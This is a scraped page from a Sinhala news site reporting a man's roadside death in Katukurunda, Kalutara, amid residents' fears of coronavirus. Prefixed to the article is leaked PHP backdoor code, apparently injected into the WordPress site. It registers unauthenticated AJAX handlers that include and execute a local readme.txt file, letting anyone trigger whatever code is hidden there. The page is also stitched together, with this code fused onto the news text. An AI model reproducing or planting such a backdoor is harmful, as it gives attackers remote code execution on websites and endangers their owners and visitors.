if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කටුකුරුන්ද පාර අයිනේ පුද්ගලයෙක් මිය යයි.. කොරෝනා යයි සැකයෙන් ප‍්‍රදේශය නොසන්සුන්.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

කටුකුරුන්ද පාර අයිනේ පුද්ගලයෙක් මිය යයි.. කොරෝනා යයි සැකයෙන් ප‍්‍රදේශය නොසන්සුන්..

අද පෙරවරුවේ කළුතර කටුකුරුන්ද ප්‍රදේශයේ මාර්ගයක් අයිනේ පුද්ගලයෙක් මිය යාමෙන් එම ප්‍රදේශයේ උණුසුම් තත්ත්වයක් ඇතිවිය.

මෙසේ මියගොස් ඇති නාඳුනන පුද්ගලයා නාගොඩ රෝහල දෙසින් පැමිණ මාර්ගය අයිනේ අසනීප වී සිටියදී මහජන සෞඛ්‍ය පරීක්ෂකවරුන් පැමිණ රෝගියා පරික්ෂා කරද්දී මියගොස් ඇත.

මෙම පුද්ගලයාට කොරෝනා වැළඳී ඇතිදැයි සැකයෙන් ප්‍රදේශවාසීන් තුළ යම් උණුසුම්කාරී තත්ත්වයක් ඇතිවිය.

පසුව එම ස්ථානයට පැමිණි පොලිස් නිලධාරීන් විසින් මළ සිරුර නාගොඩ රෝහලට ගෙන ගොස් ඇත.
(under the courtesy of lankacnews.com news web)

Related posts

ගැස්ට්‍රයිටිස් ගැන දැනගනිමු.

Shiran Viraj

උණුසුම් වු කොටදෙණියාව

Shiran Viraj

වාහන ටිකක් ආනයනයට කැබිනට් අනුමැතිය ලැබේ..

Shiran Viraj